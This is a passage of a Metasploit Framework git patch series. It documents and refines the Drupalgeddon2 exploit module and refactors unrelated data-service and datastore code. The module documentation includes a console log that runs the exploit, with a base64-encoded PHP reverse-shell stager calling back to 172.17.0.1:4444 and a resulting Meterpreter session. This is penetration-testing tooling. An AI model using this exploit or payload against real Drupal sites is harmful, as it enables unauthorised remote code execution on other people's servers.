your payload. + +**ForceExploit** + +Enable this to force exploitation regardless of the check result. +Defaults to `false`, meaning the check result is respected. + +**WritableDir** + +Set this to a writable directory without `noexec` for binary payloads. +Defaults to the current working directory (usually the webapp root). + +## Usage + +``` +msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 +msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3 +rhost => 172.17.0.3 +msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check + +[*] Drupal 7.x targeted at http://172.17.0.3/ +[*] Executing with printf(): mGE9am2CAHbvmGg +[+] 172.17.0.3:80 The target is vulnerable. +msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run + +[*] Started reverse TCP handler on 172.17.0.1:4444 +[*] Drupal 7.x targeted at http://172.17.0.3/ +[*] Executing with printf(): HmsPV8tYlEbF +[*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNy4wLjEnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2soIk5s.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw)); +[*] Sending stage (37775 bytes) to 172.17.0.3 +[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:43864) at 2018-04-24 03:55:25 -0500 + +meterpreter > getuid +Server username: www-data (33) +meterpreter > sysinfo +Computer : b3a405d5568a +OS : [redacted] +Meterpreter : php/linux +meterpreter > +``` From b507391f1b0891874a260e714425d26bfebebb76 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 04:23:52 -0500 Subject: [PATCH 37/65] Change back to vprint_status for the nth time I really couldn't decide, especially once I got rid of CmdStager. Also fully document the module options. --- .../exploit/unix/webapp/drupal_drupalgeddon2.md | 12 ++++++++++++ modules/exploits/unix/webapp/drupal_drupalgeddon2.rb | 2 +- 2 files changed, 13 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index a4a345bc75..5bf4a64a77 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -31,6 +31,11 @@ Id Name ## Options +**TARGETURI** + +Set this to the remote path of the vulnerable Drupal install. Defaults +to `/` for the web root. + **PHP_FUNC** Set this to the PHP function you'd like to execute. Defaults to @@ -41,6 +46,11 @@ Set this to the PHP function you'd like to execute. Defaults to Enable this if you'd like to see HTTP responses, including command output. Defaults to `false` unless `cmd/unix/generic` is your payload. +**VERBOSE** + +Enable this to show what function and command were executed. Defaults to +`false` due to the sometimes excessive output. + **ForceExploit** Enable this to force exploitation regardless of the check result. @@ -57,6 +67,8 @@ Defaults to the current working directory (usually the webapp root). msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3 rhost => 172.17.0.3 +msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true +verbose => true msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check [*] Drupal 7.x targeted at http://172.17.0.3/ diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index f842f3da5a..4a48d39eb6 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -257,7 +257,7 @@ class MetasploitModule < Msf::Exploit::Remote # TODO: passthru() may be disabled, so try others func = opts[:func] || datastore['PHP_FUNC'] || 'passthru' - print_status("Executing with #{func}(): #{cmd}") + vprint_status("Executing with #{func}(): #{cmd}") res = case @version.to_s From cd4861610f0224a3eaa4393e935e761ad6871357 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 04:31:30 -0500 Subject: [PATCH 38/65] Explain available targets in documentation Oops. --- .../modules/exploit/unix/webapp/drupal_drupalgeddon2.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index 5bf4a64a77..8bf6f64d0b 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -29,6 +29,14 @@ Id Name 11 Drupal 8.x (Linux Dropper) ``` +Automatic targeting means the Drupal version will be detected first. +Targets with a specific version will do as they're told (regardless of +what the server is running). + +Dropper targets write to disk. In-memory targets don't. Be mindful of +showing up in someone's process list, though. A dropper might be more +viable in that regard. + ## Options **TARGETURI** From d34119548dd158ebc17134d5ba69d5e86e1362bd Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 24 Apr 2018 06:03:02 -0500 Subject: [PATCH 39/65] replace some @ with self. --- lib/msf/core/data_store.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 3cf6753dd9..c4eb5a2d9e 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -220,10 +220,10 @@ class DataStore < Hash end def merge!(other) - @options.merge!(other.options) - @aliases.merge!(other.aliases) - @imported.merge!(other.imported) - @imported_by.merge!(other.imported_by) + self.options.merge!(other.options) + self.aliases.merge!(other.aliases) + self.imported.merge!(other.imported) + self.imported_by.merge!(other.imported_by) end def merge(other) @@ -288,8 +288,8 @@ protected # Scan each alias looking for a key search_k = k.downcase - if @aliases.has_key?(search_k) - search_k = @aliases[search_k] + if self.aliases.has_key?(search_k) + search_k = self.aliases[search_k] end # Scan each key looking for a match @@ -364,7 +364,7 @@ class ModuleDataStore < DataStore self.keys.each do |k| clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) end - clone.aliases = @aliases + clone.aliases = self.aliases clone end end From 505810ffd64b32dcad3b66ca2a5c2dcbfe534dec Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 24 Apr 2018 06:15:05 -0500 Subject: [PATCH 40/65] introspect the RHS since it it is not guaranteed to be a Datastore --- lib/msf/core/data_store.rb | 16 ++++++---------- 1 file changed, 6 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index c4eb5a2d9e..378ceefb49 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -220,19 +220,15 @@ class DataStore < Hash end def merge!(other) - self.options.merge!(other.options) - self.aliases.merge!(other.aliases) - self.imported.merge!(other.imported) - self.imported_by.merge!(other.imported_by) + super + self.aliases.merge!(other.aliases) if other.respond_to?(:aliases) + self.imported.merge!(other.imported) if other.respond_to?(:imported) + self.imported_by.merge!(other.imported_by) if other.respond_to?(:imported_by) end def merge(other) - ds = copy - ds.options.merge!(other.options) - ds.aliases.merge!(other.aliases) - ds.imported.merge!(other.imported) - ds.imported_by.merge!(other.imported_by) - ds + ds = self.copy + ds.merge!(other) end # From 1d376c78e2769499ac8fc865e735e982c8f0478b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 24 Apr 2018 06:32:38 -0500 Subject: [PATCH 41/65] ensure copy exists on DataStore too --- lib/msf/core/data_store.rb | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 378ceefb49..578db59652 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -275,6 +275,18 @@ class DataStore < Hash list.each(&block) end + # + # Return a deep copy of this datastore. + # + def copy + clone = self.class.new + self.keys.each do |k| + clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) + end + clone.aliases = self.aliases.dup + clone + end + protected # From 7afefe07a605515967053335a90f60a8432ef369 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 24 Apr 2018 06:32:54 -0500 Subject: [PATCH 42/65] aliases was not being copied, dup it --- lib/msf/core/data_store.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 578db59652..6a151c46e7 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -372,7 +372,7 @@ class ModuleDataStore < DataStore self.keys.each do |k| clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) end - clone.aliases = self.aliases + clone.aliases = self.aliases.dup clone end end From 30abdfe2fd2b92214b66140cc9ad2dadd805b7f1 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 24 Apr 2018 06:40:15 -0500 Subject: [PATCH 43/65] move copy up so it's clear what we call by default --- lib/msf/core/data_store.rb | 30 ++++++++++++++++++------------ 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 6a151c46e7..f9fc740b0c 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -219,6 +219,21 @@ class DataStore < Hash end end + # + # Return a deep copy of this datastore. + # + def copy + clone = self.class.new + self.keys.each do |k| + clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) + end + clone.aliases = self.aliases.dup + clone + end + + # + # Override merge! so that we merge the aliases and imported hashes + # def merge!(other) super self.aliases.merge!(other.aliases) if other.respond_to?(:aliases) @@ -226,6 +241,9 @@ class DataStore < Hash self.imported_by.merge!(other.imported_by) if other.respond_to?(:imported_by) end + # + # Override merge to ensure we merge the aliases and imported hashes + # def merge(other) ds = self.copy ds.merge!(other) @@ -275,18 +293,6 @@ class DataStore < Hash list.each(&block) end - # - # Return a deep copy of this datastore. - # - def copy - clone = self.class.new - self.keys.each do |k| - clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) - end - clone.aliases = self.aliases.dup - clone - end - protected # From cfaca5baa37f17c32559ff47bd736e7c207a7375 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 11:25:55 -0500 Subject: [PATCH 44/65] Restore a return lost in the refactor :( Also spiff up comments. --- modules/exploits/unix/webapp/drupal_drupalgeddon2.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 4a48d39eb6..0c9b725dc5 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -254,7 +254,6 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - # TODO: passthru() may be disabled, so try others func = opts[:func] || datastore['PHP_FUNC'] || 'passthru' vprint_status("Executing with #{func}(): #{cmd}") @@ -292,6 +291,7 @@ class MetasploitModule < Msf::Exploit::Remote return unless res && res.code == 200 + # Check for an X-Generator header @version = case res.headers['X-Generator'] when /Drupal 7/ @@ -300,6 +300,9 @@ class MetasploitModule < Msf::Exploit::Remote Gem::Version.new('8.x') end + return @version if @version + + # Check for a tag generator = res.get_html_document.at( '//meta[@name = "Generator"]/@content' ) From 0d284197cbf8d16a1c8eee90f2253f2d94bf4092 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 24 Apr 2018 15:01:17 -0400 Subject: [PATCH 45/65] Add MsfServlet to host endpoint for online check --- .../db_manager/http/servlet/msf_servlet.rb | 25 +++++++++++++++++++ .../http/servlet/online_test_servlet.rb | 21 ---------------- lib/msf/core/db_manager/http/sinatra_app.rb | 4 +-- 3 files changed, 27 insertions(+), 23 deletions(-) create mode 100644 lib/msf/core/db_manager/http/servlet/msf_servlet.rb delete mode 100644 lib/msf/core/db_manager/http/servlet/online_test_servlet.rb diff --git a/lib/msf/core/db_manager/http/servlet/msf_servlet.rb b/lib/msf/core/db_manager/http/servlet/msf_servlet.rb new file mode 100644 index 0000000000..5fc6ba307a --- /dev/null +++ b/lib/msf/core/db_manager/http/servlet/msf_servlet.rb @@ -0,0 +1,25 @@ +module MsfServlet + + def self.api_path + '/api/v1/msf' + end + + def self.api_version_path + "#{MsfServlet.api_path}/version" + end + + def self.registered(app) + app.get MsfServlet.api_version_path, &get_msf_version + end + + ####### + private + ####### + + def self.get_msf_version + lambda { + set_json_response({metasploit_version: Metasploit::Framework::VERSION}) + } + end + +end \ No newline at end of file diff --git a/lib/msf/core/db_manager/http/servlet/online_test_servlet.rb b/lib/msf/core/db_manager/http/servlet/online_test_servlet.rb deleted file mode 100644 index 1462f81ede..0000000000 --- a/lib/msf/core/db_manager/http/servlet/online_test_servlet.rb +++ /dev/null @@ -1,21 +0,0 @@ -module OnlineTestServlet - - def self.api_path - '/api/v1/online' - end - - def self.registered(app) - app.get OnlineTestServlet.api_path, &get_active - end - - ####### - private - ####### - - def self.get_active - lambda { - set_empty_response() - } - end - -end \ No newline at end of file diff --git a/lib/msf/core/db_manager/http/sinatra_app.rb b/lib/msf/core/db_manager/http/sinatra_app.rb index 5f7d67b7d8..7a4e575ff3 100644 --- a/lib/msf/core/db_manager/http/sinatra_app.rb +++ b/lib/msf/core/db_manager/http/sinatra_app.rb @@ -5,7 +5,7 @@ require 'msf/core/db_manager/http/servlet/note_servlet' require 'msf/core/db_manager/http/servlet/vuln_servlet' require 'msf/core/db_manager/http/servlet/event_servlet' require 'msf/core/db_manager/http/servlet/web_servlet' -require 'msf/core/db_manager/http/servlet/online_test_servlet' +require 'msf/core/db_manager/http/servlet/msf_servlet' require 'msf/core/db_manager/http/servlet/workspace_servlet' require 'msf/core/db_manager/http/servlet/service_servlet' require 'msf/core/db_manager/http/servlet/session_servlet' @@ -26,7 +26,7 @@ class SinatraApp < Sinatra::Base register VulnServlet register EventServlet register WebServlet - register OnlineTestServlet + register MsfServlet register NoteServlet register WorkspaceServlet register ServiceServlet From 01dd79173b8f1fd7478c7717bedf21abb66745f7 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 24 Apr 2018 15:11:16 -0400 Subject: [PATCH 46/65] Add data proxy and service for online check --- .../data_service/proxy/data_proxy_auto_loader.rb | 2 ++ .../framework/data_service/proxy/msf_data_proxy.rb | 10 ++++++++++ .../remote/http/data_service_auto_loader.rb | 2 ++ .../remote/http/remote_msf_data_service.rb | 12 ++++++++++++ .../framework/data_service/stubs/msf_data_service.rb | 5 +++++ 5 files changed, 31 insertions(+) create mode 100644 lib/metasploit/framework/data_service/proxy/msf_data_proxy.rb create mode 100644 lib/metasploit/framework/data_service/remote/http/remote_msf_data_service.rb create mode 100644 lib/metasploit/framework/data_service/stubs/msf_data_service.rb diff --git a/lib/metasploit/framework/data_service/proxy/data_proxy_auto_loader.rb b/lib/metasploit/framework/data_service/proxy/data_proxy_auto_loader.rb index ee6ef1949a..479b9db07d 100644 --- a/lib/metasploit/framework/data_service/proxy/data_proxy_auto_loader.rb +++ b/lib/metasploit/framework/data_service/proxy/data_proxy_auto_loader.rb @@ -18,6 +18,7 @@ module DataProxyAutoLoader autoload :NmapDataProxy, 'metasploit/framework/data_service/proxy/nmap_data_proxy' autoload :DbExportDataProxy, 'metasploit/framework/data_service/proxy/db_export_data_proxy' autoload :VulnAttemptDataProxy, 'metasploit/framework/data_service/proxy/vuln_attempt_data_proxy' + autoload :MsfDataProxy, 'metasploit/framework/data_service/proxy/msf_data_proxy' include ServiceDataProxy include HostDataProxy @@ -34,4 +35,5 @@ module DataProxyAutoLoader include NmapDataProxy include DbExportDataProxy include VulnAttemptDataProxy + include MsfDataProxy end \ No newline at end of file diff --git a/lib/metasploit/framework/data_service/proxy/msf_data_proxy.rb b/lib/metasploit/framework/data_service/proxy/msf_data_proxy.rb new file mode 100644 index 0000000000..238fc6b6b7 --- /dev/null +++ b/lib/metasploit/framework/data_service/proxy/msf_data_proxy.rb @@ -0,0 +1,10 @@ +module MsfDataProxy + def get_msf_version + begin + data_service = self.get_data_service + data_service.get_msf_version + rescue Exception => e + self.log_error(e, "Problem retrieving Metasploit version") + end + end +end \ No newline at end of file diff --git a/lib/metasploit/framework/data_service/remote/http/data_service_auto_loader.rb b/lib/metasploit/framework/data_service/remote/http/data_service_auto_loader.rb index c4bc34d9af..6086f99955 100644 --- a/lib/metasploit/framework/data_service/remote/http/data_service_auto_loader.rb +++ b/lib/metasploit/framework/data_service/remote/http/data_service_auto_loader.rb @@ -17,6 +17,7 @@ module DataServiceAutoLoader autoload :RemoteNmapDataService, 'metasploit/framework/data_service/remote/http/remote_nmap_data_service' autoload :RemoteDbExportDataService, 'metasploit/framework/data_service/remote/http/remote_db_export_data_service' autoload :RemoteVulnAttemptDataService, 'metasploit/framework/data_service/remote/http/remote_vuln_attempt_data_service' + autoload :RemoteMsfDataService, 'metasploit/framework/data_service/remote/http/remote_msf_data_service' include RemoteHostDataService include RemoteEventDataService @@ -33,4 +34,5 @@ module DataServiceAutoLoader include RemoteNmapDataService include RemoteDbExportDataService include RemoteVulnAttemptDataService + include RemoteMsfDataService end \ No newline at end of file diff --git a/lib/metasploit/framework/data_service/remote/http/remote_msf_data_service.rb b/lib/metasploit/framework/data_service/remote/http/remote_msf_data_service.rb new file mode 100644 index 0000000000..103267f209 --- /dev/null +++ b/lib/metasploit/framework/data_service/remote/http/remote_msf_data_service.rb @@ -0,0 +1,12 @@ +require 'metasploit/framework/data_service/remote/http/response_data_helper' + +module RemoteMsfDataService + include ResponseDataHelper + + MSF_API_PATH = '/api/v1/msf' + MSF_VERSION_API_PATH = "#{MSF_API_PATH}/version" + + def get_msf_version + json_to_hash(self.get_data(MSF_VERSION_API_PATH, nil, nil)) + end +end \ No newline at end of file diff --git a/lib/metasploit/framework/data_service/stubs/msf_data_service.rb b/lib/metasploit/framework/data_service/stubs/msf_data_service.rb new file mode 100644 index 0000000000..c898981fbf --- /dev/null +++ b/lib/metasploit/framework/data_service/stubs/msf_data_service.rb @@ -0,0 +1,5 @@ +module MsfDataService + def get_msf_version + raise 'MsfDataService#get_msf_version is not implemented' + end +end \ No newline at end of file From f66029d1293ce3da2f0c43d594f2f933d8021eca Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 24 Apr 2018 16:54:10 -0400 Subject: [PATCH 47/65] Validate remote data service instance Adds simple data service instance validation when registering and setting a data service. --- lib/metasploit/framework/data_service.rb | 8 +++ .../framework/data_service/proxy/core.rb | 22 ++++++--- .../data_service/remote/http/core.rb | 49 +++++++++++++------ 3 files changed, 56 insertions(+), 23 deletions(-) diff --git a/lib/metasploit/framework/data_service.rb b/lib/metasploit/framework/data_service.rb index 49b4b2065e..a475f0c81b 100644 --- a/lib/metasploit/framework/data_service.rb +++ b/lib/metasploit/framework/data_service.rb @@ -6,8 +6,10 @@ require 'metasploit/framework/data_service/stubs/note_data_service' require 'metasploit/framework/data_service/stubs/web_data_service' require 'metasploit/framework/data_service/stubs/service_data_service' require 'metasploit/framework/data_service/stubs/session_data_service' +require 'metasploit/framework/data_service/stubs/session_event_service' require 'metasploit/framework/data_service/stubs/exploit_data_service' require 'metasploit/framework/data_service/stubs/loot_data_service' +require 'metasploit/framework/data_service/stubs/msf_data_service' # # All data service implementations should include this module to ensure proper implementation @@ -23,8 +25,10 @@ module DataService include NoteDataService include ServiceDataService include SessionDataService + include SessionEventDataService include ExploitDataService include LootDataService + include MsfDataService def name raise 'DataService#name is not implemented'; @@ -34,6 +38,10 @@ module DataService raise 'DataService#active is not implemented'; end + def active=(value) + raise 'DataService#active= is not implemented'; + end + def is_local? raise 'DataService#is_local? is not implemented'; end diff --git a/lib/metasploit/framework/data_service/proxy/core.rb b/lib/metasploit/framework/data_service/proxy/core.rb index f59ac73d1d..0565eccb6f 100644 --- a/lib/metasploit/framework/data_service/proxy/core.rb +++ b/lib/metasploit/framework/data_service/proxy/core.rb @@ -52,30 +52,36 @@ class DataProxy end # - # Registers a data service with the proxy and immediately - # set as primary if online + # Registers the specified data service with the proxy + # and immediately sets it as the primary if active # - def register_data_service(data_service, online=false) + def register_data_service(data_service) validate(data_service) data_service_id = @data_service_id += 1 @data_services[data_service_id] = data_service - set_data_service(data_service_id, online) + set_data_service(data_service_id) end # # Set the data service to be used # - def set_data_service(data_service_id, online=false) + def set_data_service(data_service_id) data_service = @data_services[data_service_id.to_i] if data_service.nil? raise "Data service with id: #{data_service_id} does not exist" end - if !online && !data_service.active - raise "Data service not online: #{data_service.name}, not setting as active" + unless data_service.active + raise "Data service #{data_service.name} is not online, and won't be set as active" end + prev_data_service = @current_data_service @current_data_service = data_service + # reset the previous data service's active flag if it is remote + # to ensure checks are performed the next time it is set + if !prev_data_service.nil? && !prev_data_service.is_local? + prev_data_service.active = false + end end # @@ -154,7 +160,7 @@ class DataProxy begin db_manager = opts.delete(:db_manager) if !db_manager.nil? - register_data_service(db_manager, true) + register_data_service(db_manager) @usable = true else @error = 'disabled' diff --git a/lib/metasploit/framework/data_service/remote/http/core.rb b/lib/metasploit/framework/data_service/remote/http/core.rb index 69a7f1fa5c..463113d27a 100644 --- a/lib/metasploit/framework/data_service/remote/http/core.rb +++ b/lib/metasploit/framework/data_service/remote/http/core.rb @@ -25,6 +25,7 @@ class RemoteHTTPDataService # @param [String] endpoint A valid http or https URL. Cannot be nil # def initialize(endpoint, framework, https_opts = {}) + @active = false validate_endpoint(endpoint) @endpoint = URI.parse(endpoint) @https_opts = https_opts @@ -40,6 +41,26 @@ class RemoteHTTPDataService end + def name + "remote_data_service: (#{@endpoint})" + end + + def active + # checks if data service is online when @active is falsey and makes the assignment + # this is to prevent repetitive calls to check if data service is online + # logic should be enhanced to considering data service connectivity + # and future data service implementations + @active ||= is_online? + end + + def active=(value) + @active = value + end + + def is_local? + false + end + def error 'none' end @@ -160,21 +181,6 @@ class RemoteHTTPDataService end end - # - # TODO: fix this - # - def active - return true - end - - def name - "remote_data_service: (#{@endpoint})" - end - - def is_local? - false - end - def set_header(key, value) @headers = Hash.new() if @headers.nil? @@ -224,6 +230,19 @@ class RemoteHTTPDataService raise 'Endpoint cannot be nil' if endpoint.nil? end + # + # Checks if the data service is online by making a request + # for the Metasploit version number from the remote endpoint + # + def is_online? + response = self.get_msf_version + if response && !response[:metasploit_version].empty? + return true + end + + return false + end + def build_request(request, data_hash) request.content_type = 'application/json' if !data_hash.nil? && !data_hash.empty? From 359ef27834ba95ec418fc1bf99e57fa731ccf034 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 24 Apr 2018 17:19:54 -0400 Subject: [PATCH 48/65] Narrow rescue scope to StandardError --- lib/metasploit/framework/data_service/proxy/core.rb | 2 +- lib/metasploit/framework/data_service/proxy/msf_data_proxy.rb | 2 +- lib/metasploit/framework/data_service/remote/http/core.rb | 2 +- lib/msf/ui/console/command_dispatcher/db.rb | 4 ++-- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/metasploit/framework/data_service/proxy/core.rb b/lib/metasploit/framework/data_service/proxy/core.rb index 0565eccb6f..8e8cdfac2e 100644 --- a/lib/metasploit/framework/data_service/proxy/core.rb +++ b/lib/metasploit/framework/data_service/proxy/core.rb @@ -165,7 +165,7 @@ class DataProxy else @error = 'disabled' end - rescue Exception => e + rescue => e raise "Unable to initialize data service: #{e.message}" end end diff --git a/lib/metasploit/framework/data_service/proxy/msf_data_proxy.rb b/lib/metasploit/framework/data_service/proxy/msf_data_proxy.rb index 238fc6b6b7..ab4605e936 100644 --- a/lib/metasploit/framework/data_service/proxy/msf_data_proxy.rb +++ b/lib/metasploit/framework/data_service/proxy/msf_data_proxy.rb @@ -3,7 +3,7 @@ module MsfDataProxy begin data_service = self.get_data_service data_service.get_msf_version - rescue Exception => e + rescue => e self.log_error(e, "Problem retrieving Metasploit version") end end diff --git a/lib/metasploit/framework/data_service/remote/http/core.rb b/lib/metasploit/framework/data_service/remote/http/core.rb index 463113d27a..d0ad3a71db 100644 --- a/lib/metasploit/framework/data_service/remote/http/core.rb +++ b/lib/metasploit/framework/data_service/remote/http/core.rb @@ -173,7 +173,7 @@ class RemoteHTTPDataService rescue EOFError => e elog "No data was returned from the data service for request type/path : #{request_type}/#{path}, message: #{e.message}" return FailedResponse.new('') - rescue Exception => e + rescue => e elog "Problem with HTTP request for type/path: #{request_type}/#{path} message: #{e.message}" return FailedResponse.new('') ensure diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 00ed52708c..6105ffb0b5 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1994,7 +1994,7 @@ class Db framework.db.register_data_service(remote_data_service) print_line "Registered data service: #{remote_data_service.name}" framework.db.workspace = framework.db.default_workspace - rescue Exception => e + rescue => e print_error "There was a problem registering the remote data service: #{e.message}" end end @@ -2004,7 +2004,7 @@ class Db data_service = framework.db.set_data_service(service_id) framework.db.workspace = framework.db.default_workspace data_service - rescue Exception => e + rescue => e print_error "Unable to set data service: #{e.message}" end end From 43edf46c43a6585b9dac31b7b8fce97f52ae97ff Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 24 Apr 2018 18:34:16 -0400 Subject: [PATCH 49/65] Fix set data service for no database YAML case --- lib/metasploit/framework/data_service/proxy/core.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/metasploit/framework/data_service/proxy/core.rb b/lib/metasploit/framework/data_service/proxy/core.rb index 8e8cdfac2e..d1953e9ed1 100644 --- a/lib/metasploit/framework/data_service/proxy/core.rb +++ b/lib/metasploit/framework/data_service/proxy/core.rb @@ -71,7 +71,7 @@ class DataProxy raise "Data service with id: #{data_service_id} does not exist" end - unless data_service.active + if !data_service.is_local? && !data_service.active raise "Data service #{data_service.name} is not online, and won't be set as active" end From 8ff4407ca6a9b18e10ae180192e9b4bc2bae607b Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 20:51:51 -0500 Subject: [PATCH 50/65] Clarify version detection error message This was supposed to imply that we couldn't configure the exploit for a targetable version. Instead, it just read weirdly. I think it was missing "to target" at the end. "Determine" is a much better word, though, since we may be doing detection instead of mere configuration. --- modules/exploits/unix/webapp/drupal_drupalgeddon2.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 0c9b725dc5..3eb31da518 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Drupal #{@version} targeted at #{full_uri}") checkcode = CheckCode::Detected else - print_error('Could not configure Drupal version') + print_error('Could not determine Drupal version to target') return CheckCode::Unknown end From 89c95cae0899baf84c1883c0460f7817c65f3414 Mon Sep 17 00:00:00 2001 From: William 